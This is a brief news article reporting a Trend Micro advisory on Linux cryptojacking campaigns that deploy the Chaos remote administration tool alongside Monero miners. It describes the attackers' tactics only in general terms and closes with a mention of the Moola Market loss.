Cybersecurity researchers from Trend Micro have uncovered a new threat targeting Linux systems in cryptocurrency mining attacks. The Chaos remote administrative tool (RAT) has been identified as a key component in these attacks, as detailed in a recent advisory.
According to Trend Micro, the tactics used by threat actors in these attacks closely resemble those previously seen in cryptojacking scenarios targeting Linux machines and cloud computing instances. The attackers begin by attempting to eliminate competing malware, security products, and cloud middleware before establishing persistence and executing their payload, which often involves a Monero (XMR) cryptocurrency miner.
In a more recent discovery, Trend Micro intercepted a threat in November 2022 that incorporated the advanced RAT known as Chaos. This RAT, based on an open-source project, provides attackers with capabilities such as executing reverse shells, downloading and uploading files, and taking screenshots.
One notable aspect of the newly observed attacks is the distribution of the main downloader script and payloads across different locations to maintain campaign activity and spread. The main server used for downloading payloads in these attacks was traced back to Russia.
While incorporating a RAT into a cryptocurrency mining malware may seem like a minor enhancement, Trend Micro emphasizes the importance of remaining vigilant in the face of evolving cloud-based threats. Organizations and individuals alike are urged to prioritize security measures to protect against such threats.
The Trend Micro advisory serves as a timely reminder of the ongoing cybersecurity challenges faced by the cryptocurrency industry. Just two months prior, decentralized finance platform Moola Market experienced a security incident resulting in the loss of up to $9 million worth of cryptocurrency. As threats continue to evolve, staying informed and implementing robust security practices are essential for safeguarding digital assets.